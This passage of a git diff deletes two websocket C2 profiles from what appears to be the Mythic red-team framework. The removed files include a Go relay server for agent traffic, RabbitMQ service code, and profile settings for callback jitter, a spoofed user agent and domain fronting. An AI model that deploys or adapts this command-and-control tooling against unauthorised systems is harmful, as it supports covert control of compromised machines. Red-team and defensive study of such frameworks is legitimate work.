Exception as e: - print(str(e)) - await asyncio.sleep(2) - continue - while True: - try: - # routing key is ignored for fanout, it'll go to anybody that's listening, which will only be the server - await exchange.publish( - aio_pika.Message("heartbeat".encode()), - routing_key="c2.heartbeat.{}".format(hostname), - ) - await asyncio.sleep(10) - except Exception as e: - print(str(e)) - # if we get an exception here, break out to the bigger loop and try to connect again - break - -# start our service -loop = asyncio.get_event_loop() -loop.create_task(mythic_service()) -loop.create_task(heartbeat_loop()) -loop.run_forever() diff --git a/C2_Profiles/leviathan-websocket/mythic/rabbitmq_config.json b/C2_Profiles/leviathan-websocket/mythic/rabbitmq_config.json deleted file mode 100755 index 08581c01a..000000000 --- a/C2_Profiles/leviathan-websocket/mythic/rabbitmq_config.json +++ /dev/null @@ -1,8 +0,0 @@ -{ - "username": "mythic_user", - "password": "mythic_password", - "virtual_host": "mythic_vhost", - "host": "127.0.0.1", - "name": "hostname", - "container_files_path": "/Mythic/" -} \ No newline at end of file diff --git a/C2_Profiles/websocket/Dockerfile b/C2_Profiles/websocket/Dockerfile deleted file mode 100755 index beabdbb2f..000000000 --- a/C2_Profiles/websocket/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -From itsafeaturemythic/python38_sanic_c2profile:0.0.1 diff --git a/C2_Profiles/websocket/c2_code/config.json b/C2_Profiles/websocket/c2_code/config.json deleted file mode 100755 index e61625ddd..000000000 --- a/C2_Profiles/websocket/c2_code/config.json +++ /dev/null @@ -1,10 +0,0 @@ -{ - "bindaddress": "0.0.0.0:8081", - "usessl": false, - "sslkey":"", - "sslcert":"", - "websocketuri": "socket", - "defaultpage": "index.html", - "logfile": "server.log", - "debug": false -} diff --git a/C2_Profiles/websocket/c2_code/index.html b/C2_Profiles/websocket/c2_code/index.html deleted file mode 100755 index 49f0e897f..000000000 --- a/C2_Profiles/websocket/c2_code/index.html +++ /dev/null @@ -1,9 +0,0 @@ - - - -Under Construction - - -
This page is under construction. Please come back soon!
- - \ No newline at end of file diff --git a/C2_Profiles/websocket/c2_code/server b/C2_Profiles/websocket/c2_code/server deleted file mode 100755 index 3b371a7ec..000000000 Binary files a/C2_Profiles/websocket/c2_code/server and /dev/null differ diff --git a/C2_Profiles/websocket/c2_code/src/build_help b/C2_Profiles/websocket/c2_code/src/build_help deleted file mode 100644 index 2e0c93ad7..000000000 --- a/C2_Profiles/websocket/c2_code/src/build_help +++ /dev/null @@ -1,8 +0,0 @@ -To build the sever: - -go get github.com/gorilla/websocket -go get github.com/kabukky/httpscerts -go build -tags=websocket main.go - -this outputs a binary called "main" -move this to ../server \ No newline at end of file diff --git a/C2_Profiles/websocket/c2_code/src/main.go b/C2_Profiles/websocket/c2_code/src/main.go deleted file mode 100644 index 315276faa..000000000 --- a/C2_Profiles/websocket/c2_code/src/main.go +++ /dev/null @@ -1,35 +0,0 @@ -package main - -import ( - "encoding/json" - "io/ioutil" - "log" - "os" - - "./pkg/servers" -) - -var cf *os.File -func main() { - cf, err := os.Open("config.json") - - if err != nil { - log.Println("Error opening config file ", err.Error()) - os.Exit(-1) - } - - config, _ := ioutil.ReadAll(cf) - - c2config := servers.C2Config{} - err = json.Unmarshal(config, &c2config) - if err != nil { - log.Println("Error in unmarshal call for config ", err.Error()) - os.Exit(-1) - } - - // start the server instance with the config - c2server := servers.NewInstance().(servers.Server) - - c2server.Run(c2config) - -} diff --git a/C2_Profiles/websocket/c2_code/src/pkg/servers/server.go b/C2_Profiles/websocket/c2_code/src/pkg/servers/server.go deleted file mode 100644 index 6e7fbc321..000000000 --- a/C2_Profiles/websocket/c2_code/src/pkg/servers/server.go +++ /dev/null @@ -1,34 +0,0 @@ -package servers - -// C2Config - struct for server configuration -type C2Config struct { - BindAddress string `json:"bindaddress"` - SocketURI string `json:"websocketuri"` - SSLKey string `json:"sslkey"` - SSLCert string `json:"sslcert"` - UseSSL bool `json:"usessl"` - Defaultpage string `json:"defaultpage"` - Logfile string `json:"logfile"` - Debug bool `json:"debug"` -} - -//Server - interface used for all c2 profiles -type Server interface { - ApfellBaseURL() string - SetApfellBaseURL(url string) - PostResponse(taskid string, output []byte) []byte - PostMessage(msg []byte) []byte - GetNextTask(apfellID string) []byte - Run(cf interface{}) -} - -//Message - struct definition for messages between clients and the server -type Message struct { - Tag string `json:"tag"` - Client bool `json:"client"` - Data string `json:"data"` -} - -func NewInstance() interface{} { - return newServer() -} diff --git a/C2_Profiles/websocket/c2_code/src/pkg/servers/websocket.go b/C2_Profiles/websocket/c2_code/src/pkg/servers/websocket.go deleted file mode 100644 index 09abbf8e5..000000000 --- a/C2_Profiles/websocket/c2_code/src/pkg/servers/websocket.go +++ /dev/null @@ -1,298 +0,0 @@ -// +build websocket - -package servers - -import ( - "bytes" - "crypto/tls" - "fmt" - "io/ioutil" - "log" - "net/http" - "os" - "strings" - - "github.com/gorilla/websocket" - "github.com/kabukky/httpscerts" -) - -type WebsocketC2 struct { - BaseURL string - BindAddress string - SSL bool - SocketURI string - Defaultpage string - Logfile string - Debug bool -} - -var upgrader = websocket.Upgrader{} - -func newServer() Server { - return &WebsocketC2{} -} - -func (s *WebsocketC2) SetBindAddress(addr string) { - s.BindAddress = addr -} - 
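The build_help notes and server.go above spell out the whole wire protocol for this profile: every websocket frame is a JSON Message with tag, client, and data fields; the agent sets client to true and puts its Mythic agent message in data, and manageClient() answers on the same tag with client set to false and Mythic's response in data. A minimal client-side sketch of that exchange, assuming the third-party Python websockets package and the defaults from config.json (port 8081, endpoint "socket"); the tag and payload values are placeholders, not real agent traffic:

# Hedged sketch of the Message framing that manageClient() handles; the URL,
# tag, and data values are assumptions based on the defaults above.
import asyncio
import json

import websockets  # third-party: pip install websockets


async def checkin(url: str = "ws://127.0.0.1:8081/socket") -> None:
    async with websockets.connect(url) as ws:
        # Agent -> server: client=True, data carries the Mythic agent message.
        await ws.send(json.dumps({
            "tag": "example-tag",
            "client": True,
            "data": "base64-agent-message-here",
        }))
        # Server -> agent: same tag, client=False, data holds Mythic's reply.
        reply = json.loads(await ws.recv())
        print(reply["tag"], reply["client"], len(reply["data"]))


if __name__ == "__main__":
    asyncio.run(checkin())

The server never interprets data itself; PostMessage()/htmlPostData() simply forward it to the MYTHIC_ADDRESS URL and hand the body of that response back to the agent.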
-//ApfellBaseURL - Returns the base url for apfell -func (s WebsocketC2) ApfellBaseURL() string { - return s.BaseURL -} - -//SetApfellBaseURL - Sets the base url for apfell -func (s *WebsocketC2) SetApfellBaseURL(url string) { - s.BaseURL = url -} - -//SetSocketURI - Set socket uri -func (s *WebsocketC2) SetSocketURI(uri string) { - s.SocketURI = uri -} - -func (s *WebsocketC2) PostMessage(msg []byte) []byte { - return s.htmlPostData("", msg) -} - -func (s WebsocketC2) GetNextTask(apfellID string) []byte { - //place holder - //url := fmt.Sprintf("%sapi/v%s/agent_message", s.ApfellBaseURL(), ApiVersion) - return make([]byte, 0) -} - -func (s WebsocketC2) PostResponse(taskid string, output []byte) []byte { - //urlEnding := fmt.Sprintf("api/v%s/agent_message", ApiVersion) - return output -} - -//postRESTResponse - Wrapper to post task responses through the Apfell rest API -func (s *WebsocketC2) postRESTResponse(urlEnding string, data []byte) []byte { - return make([]byte, 0) -} - -//htmlPostData HTTP POST function -func (s *WebsocketC2) htmlPostData(urlEnding string, sendData []byte) []byte { - url := s.ApfellBaseURL() - //log.Println("Sending POST request to url: ", url) - s.Websocketlog(fmt.Sprintln("Sending POST request to: ", url)) - - req, _ := http.NewRequest("POST", url, bytes.NewBuffer(sendData)) - contentLength := len(sendData) - req.ContentLength = int64(contentLength) - tr := &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - } - client := &http.Client{Transport: tr} - resp, err := client.Do(req) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Error sending POST request: %s", err.Error())) - return make([]byte, 0) - } - - if resp.StatusCode != 200 { - s.Websocketlog(fmt.Sprintf("Did not receive 200 response code: %d", resp.StatusCode)) - return make([]byte, 0) - } - - defer resp.Body.Close() - - body, err := ioutil.ReadAll(resp.Body) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Error reading response body: %s", err.Error())) - return make([]byte, 0) - } - - return body -} - -//htmlGetData - HTTP GET request for data -func (s *WebsocketC2) htmlGetData(url string) []byte { - //log.Println("Sending HTML GET request to url: ", url) - tr := &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - } - client := &http.Client{Transport: tr} - var respBody []byte - - req, err := http.NewRequest("GET", url, nil) - if err != nil { - s.Websocketlog(fmt.Sprintf("Error creating http request: %s", err.Error())) - return make([]byte, 0) - } - - resp, err := client.Do(req) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Error completing GET request: %s", err.Error())) - return make([]byte, 0) - } - - if resp.StatusCode != 200 { - s.Websocketlog(fmt.Sprintf("Did not receive 200 response code: %d", resp.StatusCode)) - return make([]byte, 0) - } - - defer resp.Body.Close() - - respBody, _ = ioutil.ReadAll(resp.Body) - - return respBody - -} - -func (s *WebsocketC2) SetDebug(debug bool) { - s.Debug = debug -} - -//GetDefaultPage - Get the default html page -func (s WebsocketC2) GetDefaultPage() string { - return s.Defaultpage -} - -//SetDefaultPage - Set the default html page -func (s *WebsocketC2) SetDefaultPage(newpage string) { - s.Defaultpage = newpage -} - -//SocketHandler - Websockets handler -func (s WebsocketC2) SocketHandler(w http.ResponseWriter, r *http.Request) { - //Upgrade the websocket connection - upgrader.CheckOrigin = func(r *http.Request) bool { return true } - conn, err := upgrader.Upgrade(w, r, nil) - if err != nil { - 
s.Websocketlog(fmt.Sprintf("Websocket upgrade failed: %s\n", err.Error())) - http.Error(w, "websocket connection failed", http.StatusBadRequest) - return - } - - s.Websocketlog("Received new websocket client") - - go s.manageClient(conn) - -} - -func (s *WebsocketC2) manageClient(c *websocket.Conn) { - -LOOP: - for { - // Wait for the client to send the initial checkin message - m := Message{} - err := c.ReadJSON(&m) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Read error %s. Exiting session", err.Error())) - return - } - - var resp []byte - if m.Client { - s.Websocketlog(fmt.Sprintf("Received agent message %+v\n", m)) - resp = s.PostMessage([]byte(m.Data)) - } - - reply := Message{Client: false} - - if len(resp) == 0 { - reply.Data = string(make([]byte, 1)) - } else { - reply.Data = string(resp) - } - - reply.Tag = m.Tag - - if err = c.WriteJSON(reply); err != nil { - s.Websocketlog(fmt.Sprintf("Error writing json to client %s", err.Error())) - break LOOP - } - - } - - c.Close() - -} - -//ServeDefaultPage - HTTP handler -func (s WebsocketC2) ServeDefaultPage(w http.ResponseWriter, r *http.Request) { - log.Println("Received request: ", r.URL) - log.Println("URI Path ", r.URL.Path) - if (r.URL.Path == "/" || r.URL.Path == "/index.html") && r.Method == "GET" { - // Serve the default page if we receive a GET request at the base URI - http.ServeFile(w, r, s.GetDefaultPage()) - } - - http.Error(w, "Not Found", http.StatusNotFound) - return -} -//Run - main function for the websocket profile -func (s WebsocketC2) Run(config interface{}) { - cf := config.(C2Config) - s.Debug = cf.Debug - s.SetDefaultPage(cf.Defaultpage) - s.SetApfellBaseURL(os.Getenv("MYTHIC_ADDRESS")) - s.SetBindAddress(cf.BindAddress) - s.SetSocketURI(cf.SocketURI) - - // Handle requests to the base uri - http.HandleFunc("/", s.ServeDefaultPage) - // Handle requests to the websockets uri - http.HandleFunc(fmt.Sprintf("/%s", s.SocketURI), s.SocketHandler) - - // Setup all of the options according to the configuration - if !strings.Contains(cf.SSLKey, "") && !strings.Contains(cf.SSLCert, "") { - - // copy the key and cert to the local directory - keyfile, err := ioutil.ReadFile(cf.SSLKey) - if err != nil { - log.Println("Unable to read key file ", err.Error()) - } - - err = ioutil.WriteFile("key.pem", keyfile, 0644) - if err != nil { - log.Println("Unable to write key file ", err.Error()) - } - - certfile, err := ioutil.ReadFile(cf.SSLCert) - if err != nil { - log.Println("Unable to read cert file ", err.Error()) - } - - err = ioutil.WriteFile("cert.pem", certfile, 0644) - if err != nil { - log.Println("Unable to write cert file ", err.Error()) - } - } - - if cf.UseSSL { - err := httpscerts.Check("cert.pem", "key.pem") - if err != nil { - s.Websocketlog(fmt.Sprintf("Error for cert.pem or key.pem %s", err.Error())) - err = httpscerts.Generate("cert.pem", "key.pem", cf.BindAddress) - if err != nil { - log.Fatal("Error generating https cert") - os.Exit(1) - } - } - - s.Websocketlog(fmt.Sprintf("Starting SSL server at https://%s and wss://%s", cf.BindAddress, cf.BindAddress)) - err = http.ListenAndServeTLS(cf.BindAddress, "cert.pem", "key.pem", nil) - if err != nil { - log.Fatal("Failed to start raven server: ", err) - } - } else { - s.Websocketlog(fmt.Sprintf("Starting server at http://%s and ws://%s", cf.BindAddress, cf.BindAddress)) - err := http.ListenAndServe(cf.BindAddress, nil) - if err != nil { - log.Fatal("Failed to start raven server: ", err) - } - } -} - -//Websocketlog - logging function -func (s WebsocketC2) 
Websocketlog(msg string) { - if s.Debug { - log.Println(msg) - } -} diff --git a/C2_Profiles/websocket/mythic/C2ProfileBase.py b/C2_Profiles/websocket/mythic/C2ProfileBase.py deleted file mode 100644 index 313cdf49f..000000000 --- a/C2_Profiles/websocket/mythic/C2ProfileBase.py +++ /dev/null @@ -1,130 +0,0 @@ -from enum import Enum -from abc import abstractmethod -import json - - -class ParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - Array = "Array" - Date = "Date" - Dictionary = "Dictionary" - - -class C2ProfileParameter: - def __init__( - self, - name: str, - description: str, - default_value: str = "", - randomize: bool = False, - format_string: str = "", - parameter_type: ParameterType = ParameterType.String, - required: bool = True, - verifier_regex: str = "", - choices: [str] = None, - ): - self.name = name - self.description = description - self.randomize = randomize - self.format_string = format_string - self.parameter_type = parameter_type - self.required = required - self.verifier_regex = verifier_regex - self.choices = choices - self.default_value = "" - if self.parameter_type == ParameterType.ChooseOne and choices is not None: - self.default_value = "\n".join(choices) - else: - self.default_value = default_value - - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "default_value": self.default_value if self.parameter_type not in [ParameterType.Array, ParameterType.Dictionary] else json.dumps(self.default_value), - "randomize": self.randomize, - "format_string": self.format_string, - "required": self.required, - "parameter_type": self.parameter_type.value, - "verifier_regex": self.verifier_regex, - } - - -class C2Profile: - @property - @abstractmethod - def name(self): - pass - - @property - @abstractmethod - def description(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def is_p2p(self): - pass - - @property - @abstractmethod - def is_server_routed(self): - pass - - @property - @abstractmethod - def mythic_encrypts(self): - pass - - @property - @abstractmethod - def parameters(self): - pass - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "author": self.author, - "mythic_encrypts": self.mythic_encrypts, - "is_p2p": self.is_p2p, - "is_server_routed": self.is_server_routed, - "params": [x.to_json() for x in self.parameters], - } - - -class RPCStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, status: RPCStatus = None, response: str = None): - self.status = status - self.response = response - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - def to_json(self): - return {"status": self.status.value, "response": self.response} diff --git a/C2_Profiles/websocket/mythic/MythicBaseRPC.py b/C2_Profiles/websocket/mythic/MythicBaseRPC.py deleted file mode 100644 index e190491ac..000000000 --- a/C2_Profiles/websocket/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,99 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -import json -from enum import Enum - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if 
resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self): - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("/Mythic/mythic/rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) - - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - self.futures[correlation_id] = future - if receiver is None: - router = "c2rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return RPCResponse(json.loads(await future)) diff --git a/C2_Profiles/websocket/mythic/MythicCallbackRPC.py b/C2_Profiles/websocket/mythic/MythicCallbackRPC.py deleted file mode 100644 index 002a8038c..000000000 --- a/C2_Profiles/websocket/mythic/MythicCallbackRPC.py +++ /dev/null @@ -1,124 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCallbackRPC(MythicBaseRPC): - # returns dictionary of `{"raw": raw_tasking, "encrypted": base64(uuid+encrypted_tasking)}` - async def get_tasking( - self, uuid: str, tasking_size: int = 1 - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_tasking", - "uuid": uuid, - "tasking_size": tasking_size, - } - ) - return MythicRPCResponse(resp) - - async def add_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "add_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - 
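Every helper in MythicCallbackRPC follows the same shape: build a dict with an action key, pass it to MythicBaseRPC.call(), which publishes it to c2rpc_queue with a fresh correlation id and awaits the reply on the exclusive callback queue, then wrap the result in MythicRPCResponse. A hedged usage sketch from inside a profile container (it assumes the rabbitmq_config.json that connect() reads is in place; the callback UUID is a placeholder):

# Illustrative only: mirrors the commented-out add_event_message call in
# C2_RPC_functions.py and must run where RabbitMQ and the config are reachable.
import asyncio

from MythicCallbackRPC import MythicCallbackRPC


async def demo(callback_uuid: str) -> None:
    rpc = MythicCallbackRPC()
    # Post a line to the operation's event feed.
    event = await rpc.add_event_message(message="websocket profile is alive")
    # Ask Mythic to encrypt a blob for a specific callback, prefixed with its UUID.
    blob = await rpc.encrypt_bytes(data=b"tasking", uuid=callback_uuid, with_uuid=True)
    print(event.status, blob.status)


# asyncio.get_event_loop().run_until_complete(demo("CALLBACK-UUID-HERE"))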
async def remove_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "remove_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def get_callback_info(self, uuid: str) -> MythicRPCResponse: - resp = await self.call({"action": "get_callback_info", "uuid": uuid}) - return MythicRPCResponse(resp) - - async def get_encryption_data(self, uuid: str, profile: str) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_encryption_data", - "uuid": uuid, - "c2_profile": profile, - } - ) - return MythicRPCResponse(resp) - - async def update_callback_info(self, uuid: str, info: dict) -> MythicRPCResponse: - resp = await self.call( - {"action": "update_callback_info", "uuid": uuid, "data": info} - ) - return MythicRPCResponse(resp) - - async def add_event_message( - self, message: str, level: str = "info" - ) -> MythicRPCResponse: - resp = await self.call( - {"action": "add_event_message", "level": level, "message": message} - ) - return MythicRPCResponse(resp) - - async def encrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "uuid": uuid, - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "uuid": uuid, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) diff --git a/C2_Profiles/websocket/mythic/__init__.py b/C2_Profiles/websocket/mythic/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/C2_Profiles/websocket/mythic/c2_functions/C2_RPC_functions.py b/C2_Profiles/websocket/mythic/c2_functions/C2_RPC_functions.py deleted file mode 100644 index 6332e7fc2..000000000 --- a/C2_Profiles/websocket/mythic/c2_functions/C2_RPC_functions.py +++ /dev/null @@ -1,11 +0,0 @@ -from C2ProfileBase import * -import MythicCallbackRPC - -# request is a dictionary: {"action": func_name, "message": "the input", "task_id": task id num} -# must return an RPCResponse() object and set .status to an instance of RPCStatus and response to str of message -async def test(request): - response = RPCResponse() - response.status = RPCStatus.Success - response.response = "hello" - #resp = await MythicCallbackRPC.MythicCallbackRPC().add_event_message(message="got a POST message") - return response \ No newline at end of file diff --git a/C2_Profiles/websocket/mythic/c2_functions/__init__.py b/C2_Profiles/websocket/mythic/c2_functions/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/C2_Profiles/websocket/mythic/c2_functions/websocket.py b/C2_Profiles/websocket/mythic/c2_functions/websocket.py deleted file mode 100644 index 393546be5..000000000 --- a/C2_Profiles/websocket/mythic/c2_functions/websocket.py +++ /dev/null @@ -1,70 +0,0 @@ -from C2ProfileBase import * - - -class Websocket(C2Profile): - name = "websocket" - description = "Websocket C2 Server for poseidon" - author = "@xorrior" - is_p2p = False - is_server_routed = False - mythic_encrypts = True - parameters = [ - C2ProfileParameter( - name="callback_host", - description="Callback Host", - 
default_value="ws://127.0.0.1", - verifier_regex="^(ws|wss)://[a-zA-Z0-9]+", - ), - C2ProfileParameter( - name="USER_AGENT", - description="User Agent", - default_value="Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", - required=False, - ), - C2ProfileParameter( - name="AESPSK", - description="Base64 of a 32B AES Key", - default_value="", - required=False, - ), - C2ProfileParameter( - name="callback_interval", - description="Callback Interval in seconds", - default_value="10", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="encrypted_exchange_check", - description="Perform Key Exchange", - choices=["T", "F"], - parameter_type=ParameterType.ChooseOne, - required=False, - ), - C2ProfileParameter( - name="domain_front", - description="Host header value for domain fronting", - default_value="", - required=False, - ), - C2ProfileParameter( - name="ENDPOINT_REPLACE", - description="Websockets Endpoint", - default_value="socket", - required=False, - ), - C2ProfileParameter( - name="callback_jitter", - description="Callback Jitter in percent", - default_value="37", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="callback_port", - description="Callback Port", - default_value="8081", - verifier_regex="^[0-9]+$", - required=False, - ), - ] diff --git a/C2_Profiles/websocket/mythic/c2_service.sh b/C2_Profiles/websocket/mythic/c2_service.sh deleted file mode 100755 index 00627848a..000000000 --- a/C2_Profiles/websocket/mythic/c2_service.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -cd /Mythic/mythic - -export PYTHONPATH=/Mythic:/Mythic/mythic - -python3.8 mythic_service.py diff --git a/C2_Profiles/websocket/mythic/mythic_service.py b/C2_Profiles/websocket/mythic/mythic_service.py deleted file mode 100755 index dde56b77c..000000000 --- a/C2_Profiles/websocket/mythic/mythic_service.py +++ /dev/null @@ -1,410 +0,0 @@ -#!/usr/bin/env python3 -import aio_pika -import os -import time -import sys -import subprocess -import _thread -import base64 -import json -import socket -import asyncio -import pathlib -import traceback -from C2ProfileBase import * -from importlib import import_module, invalidate_caches -from functools import partial - -credentials = None -connection_params = None -running = False -process = None -thread = None -hostname = "" -output = "" -exchange = None -container_files_path = None - - -def deal_with_stdout(): - global process - global output - while True: - try: - for line in iter(process.stdout.readline, b""): - output += line.decode("utf-8") - except Exception as e: - print("Exiting thread due to: {}\n".format(str(e))) - sys.stdout.flush() - break - - -def import_all_c2_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("c2_functions/*.py") - invalidate_caches() - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("c2_functions." 
+ pathlib.Path(x).stem, package=None) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -async def send_status(message="", routing_key=""): - global exchange - try: - message_body = aio_pika.Message(message.encode()) - await exchange.publish(message_body, routing_key=routing_key) - except Exception as e: - print("Exception in send_status: {}".format(str(e))) - sys.stdout.flush() - - -async def callback(message: aio_pika.IncomingMessage): - global running - global process - global output - global thread - global hostname - global container_files_path - with message.process(): - # messages of the form: c2.modify.PROFILE NAME.command - try: - command = message.routing_key.split(".")[3] - username = message.routing_key.split(".")[4] - server_path = container_files_path / "server" - # command = body.decode('utf-8') - if command == "start": - if not running: - # make sure to start the /Apfell/server in the background - os.chmod(server_path, mode=0o777) - output = "" - process = subprocess.Popen( - str(server_path), - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - cwd=str(container_files_path), - ) - thread = _thread.start_new_thread(deal_with_stdout, ()) - time.sleep(3) - process.poll() - if process.returncode is not None: - # this means something went wrong and the process is dead - running = False - await send_status( - message="Failed to start\nOutput: {}".format(output), - routing_key="c2.status.{}.stopped.start.{}".format( - hostname, username - ), - ) - output = "" - else: - running = True - await send_status( - message="Started with pid: {}...\nOutput: {}".format( - str(process.pid), output - ), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Already running...\nOutput: {}".format(output), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - elif command == "stop": - if running: - try: - process.kill() - process.communicate() - except Exception as e: - pass - try: - thread.exit() - except Exception as e: - pass - running = False - await send_status( - message="Process killed...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Process not running...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - # make sure to stop the /Apfell/server in the background - elif command == "status": - if running: - await send_status( - message="Output: {}".format(output), - routing_key="c2.status.{}.running.status.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="C2 is not running", - routing_key="c2.status.{}.stopped.status.{}".format( - hostname, username - ), - ) - elif command == "get_config": - try: - path = container_files_path / "config.json" - file_data = open(path, "rb").read() - except Exception as e: - file_data = b"File not found" - encoded_data = json.dumps( - { - "filename": "config.json", - "data": base64.b64encode(file_data).decode("utf-8"), - } - ) - await send_status( - message=encoded_data, - routing_key="c2.status.{}.{}.get_config.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "writefile": - try: - message = json.loads(message.body.decode("utf-8")) - file_path = container_files_path / message["file_path"] - 
file_path = file_path.resolve() - if container_files_path not in file_path.parents: - response = { - "status": "error", - "error": "trying to break out of path", - } - else: - file = open(file_path, "wb") - file.write(base64.b64decode(message["data"])) - file.close() - response = {"status": "success", "file": message["file_path"]} - except Exception as e: - response = {"status": "error", "error": str(e)} - await send_status( - message=json.dumps(response), - routing_key="c2.status.{}.{}.writefile.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "sync_classes": - try: - import_all_c2_functions() - # c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - else: - print("Unknown command: {}".format(command)) - sys.stdout.flush() - except Exception as e: - print("Failed overall message processing: " + str(e)) - sys.stdout.flush() - - -async def sync_classes(): - try: - import_all_c2_functions() - c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - - -async def rabbit_c2_rpc_callback( - exchange: aio_pika.Exchange, message: aio_pika.IncomingMessage -): - with message.process(): - request = json.loads(message.body.decode()) - if "action" in request: - response = await globals()[request["action"]](request) - response = json.dumps(response.to_json()).encode() - else: - response = json.dumps( - {"status": "error", "error": "Missing action"} - ).encode() - try: - await exchange.publish( - aio_pika.Message(body=response, correlation_id=message.correlation_id), - routing_key=message.reply_to, - ) - except Exception as e: - print( - "Exception trying to send message back to container for rpc! 
